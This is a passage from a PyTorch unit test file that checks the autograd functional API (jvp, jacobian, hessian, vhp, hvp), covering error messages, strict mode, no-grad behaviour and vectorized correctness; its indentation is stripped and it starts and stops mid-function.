return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
